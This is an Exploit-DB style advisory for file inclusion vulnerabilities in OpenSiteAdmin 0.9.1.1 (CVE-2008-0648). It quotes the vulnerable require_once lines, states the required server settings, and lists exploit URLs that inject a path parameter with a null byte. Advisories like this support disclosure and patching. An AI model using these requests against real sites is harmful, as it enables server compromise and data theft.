OpenSiteAdmin <= 0.9.1.1 - Multiple File Inclusion Vulnerabilities

2008-02-06T00:00:00
ID EDB-ID:5068
Type exploitdb
Reporter Trancek
Modified 2008-02-06T00:00:00

Description

OpenSiteAdmin <= 0.9.1.1 Multiple File Inclusion Vulnerabilities. CVE-2008-0648. Webapps exploit for php platform

                                        
                                            Software Vulnerable:

OpenSiteAdmin 0.9.1 BETA and maybe prior versions.

Vulnerable Code:

-OpenSiteAdmin/indexFooter.php
require_once($path."footer.php");

-OpenSiteAdmin/scripts/classes/DatabaseManager.php
require_once($path."OpenSiteAdmin/include.php");
require_once($path."OpenSiteAdmin/scripts/classes/ErrorLogManager.php");

-OpenSiteAdmin/scripts/classes/FieldManager.php
require_once($path."OpenSiteAdmin/scripts/classes/Fields/Checkbox.php");
require_once($path."OpenSiteAdmin/scripts/classes/Fields/ForeignKey.php");
.....
..

-OpenSiteAdmin/scripts/classes/Filter.php
require_once($path."OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php");

-OpenSiteAdmin/scripts/classes/Form.php
require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_List.php");
require_once($path."/OpenSiteAdmin/scripts/classes/Forms/Form_Single.php");

-OpenSiteAdmin/scripts/classes/FormManager.php
require_once($path."OpenSiteAdmin/scripts/classes/Form.php");

-OpenSiteAdmin/scripts/classes/LoginManager.php
require_once($path."OpenSiteAdmin/scripts/classes/SecurityManager.php");

-OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php
require_once($path."OpenSiteAdmin/scripts/classes/RowManager.php");

Download:
http://sourceforge.net/project/showfiles.php?group_id=213524

Server should have:
    Register Globals: On
    Magic_quotes_gpc: Off

Exploit:

http://www.vulnerable.com/OpenSiteAdmin/indexFooter.php?path=&lt;File Inclusion&gt;%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=&lt;File Inclusion&gt;%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FieldManager.php?path=&lt;File Inclusion&gt;%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filter.php?path=&lt;File Inclusion&gt;%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Form.php?path=&lt;File Inclusion&gt;%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/FormManager.php?path=&lt;File Inclusion&gt;%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/LoginManager.php?path=&lt;File Inclusion&gt;%00
http://www.vulnerable.com/OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=&lt;File Inclusion&gt;%00

Greetz:

Members of http://www.p1mp4m.es and http://www.yashira.org

Author:

Trancek

# milw0rm.com [2008-02-06]